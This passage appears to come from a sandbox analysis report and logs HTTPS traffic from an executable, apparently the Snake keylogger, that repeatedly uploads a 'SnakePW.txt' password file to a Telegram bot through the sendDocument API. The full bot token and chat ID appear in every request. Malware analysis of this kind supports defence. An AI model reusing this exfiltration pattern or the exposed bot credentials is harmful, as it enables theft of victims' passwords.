2024-09-27 10:53:36 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:36 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:36 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 31 36 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36922,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434416,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	49772	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:37 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce828840f367e Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:37 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 38 32 38 38 34 30 66 33 36 37 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce828840f367eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:37 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:37 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:37 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 31 37 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36923,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434417,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	49773	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:38 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce877a27dbee6 Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:38 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 38 37 37 61 32 37 64 62 65 65 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce877a27dbee6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:38 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:38 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:38 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 31 38 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36924,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434418,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.7	49774	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:39 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcea74137d8a4a Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:39 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 61 37 34 31 33 37 64 38 61 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcea74137d8a4aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:39 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:39 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:39 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 31 39 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36925,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434419,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.7	49775	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:40 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcea958ea7bf62 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:40 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 61 39 35 38 65 61 37 62 66 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcea958ea7bf62Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:40 GMT Content-Type: application/json Content-Length: 524 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:41 UTC	524	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 32 30 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36926,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434420,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.7	49776	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:41 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dceb010d6fdd7f Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:41 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 62 30 31 30 64 36 66 64 64 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dceb010d6fdd7fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:42 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:42 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:42 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 32 32 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36927,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434422,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.7	49777	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:43 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dceb74ccc25642 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:43 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 62 37 34 63 63 63 32 35 36 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dceb74ccc25642Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:43 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:43 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:43 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 32 33 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36928,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434423,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.7	49778	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:44 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcebc8594d8039 Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:44 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 62 63 38 35 39 34 64 38 30 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcebc8594d8039Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:44 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:44 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 37 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:44 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 37 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 37 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 37","parameters":{"retry_after":37}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.7	49779	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:44 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcec1905bf2532 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
